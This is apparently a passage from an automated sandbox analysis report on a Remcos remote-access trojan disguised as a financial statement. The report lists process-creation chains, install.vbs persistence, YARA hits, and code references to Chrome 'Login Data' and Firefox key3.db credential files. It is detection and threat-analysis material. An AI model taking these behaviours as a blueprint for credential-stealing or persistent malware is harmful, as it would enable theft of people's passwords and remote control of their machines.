basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe7_2_0040A5F5
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe25_2_0040A5F5
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00410145 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,StrToIntA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,mouse_event,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,7_2_00410145
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess created: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1Jump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe'Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: unknown unknown
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: PxxoServicesTrialNet1.exe, 00000019.00000002.915829064.00000000017E0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: PxxoServicesTrialNet1.exe, 00000019.00000002.915829064.00000000017E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: PxxoServicesTrialNet1.exe, 00000019.00000002.915829064.00000000017E0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: PxxoServicesTrialNet1.exe, 00000019.00000002.916029864.0000000002D86000.00000004.00000040.sdmpBinary or memory string: Program Managererstrator7
          Source: PxxoServicesTrialNet1.exe, 00000019.00000002.916029864.0000000002D86000.00000004.00000040.sdmpBinary or memory string: Program Managerer ]
          Source: PxxoServicesTrialNet1.exe, 00000019.00000002.915829064.00000000017E0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: PxxoServicesTrialNet1.exe, 00000019.00000002.916029864.0000000002D86000.00000004.00000040.sdmpBinary or memory string: Program Manager-Y057I8
          Source: PxxoServicesTrialNet1.exe, 00000019.00000002.916029864.0000000002D86000.00000004.00000040.sdmpBinary or memory string: Program Manager=
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_004124A0 cpuid 7_2_004124A0
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,7_2_00409E7D
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,25_2_00409E7D
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeQueries volume information: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeQueries volume information: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeQueries volume information: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeQueries volume information: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0041203B GetLocalTime,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,printf,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,7_2_0041203B
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00412163 GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,7_2_00412163
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected Remcos RATShow sources
          Source: Yara matchFile source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.780636700.0000000003E8B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.710784907.0000000004374000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.706118629.0000000003969000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.781443613.00000000049AD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.771805512.000000000559E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.752626728.0000000003279000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.766450964.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.759339292.0000000003C85000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 4480, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 7144, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 5772, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: EXTRACTOSERFINANZA989543704031499704092798964.exe PID: 6880, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 6788, type: MEMORY
          Source: Yara matchFile source: 33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.raw.unpack, type: UNPACKEDPE
          Contains functionality to steal Chrome passwords or cookiesShow sources
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data7_2_0040710F
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data25_2_0040710F
          Contains functionality to steal Firefox passwords or cookiesShow sources
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\7_2_0040728F
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: \key3.db7_2_0040728F
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\25_2_0040728F
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: \key3.db25_2_0040728F

          Remote Access Functionality:

          barindex
          Detected Remcos RATShow sources
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.710784907.0000000004374000.00000004.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.710784907.0000000004374000.00000004.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exeString found in binary or memory: Remcos_Mutex_Inj
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
          Source: PxxoServicesTrialNet1.exe, 0000000F.00000002.766450964.0000000002DE1000.00000004.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
          Source: PxxoServicesTrialNet1.exe, 0000000F.00000002.766450964.0000000002DE1000.00000004.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
          Source: PxxoServicesTrialNet1.exe, 00000010.00000002.780636700.0000000003E8B000.00000004.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
          Source: PxxoServicesTrialNet1.exe, 00000010.00000002.780636700.0000000003E8B000.00000004.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
          Source: PxxoServicesTrialNet1.exe, 00000018.00000002.752626728.0000000003279000.00000004.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
          Source: PxxoServicesTrialNet1.exe, 00000018.00000002.752626728.0000000003279000.00000004.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
          Source: PxxoServicesTrialNet1.exeString found in binary or memory: Remcos_Mutex_Inj
          Source: PxxoServicesTrialNet1.exe, 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
          Source: PxxoServicesTrialNet1.exe, 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
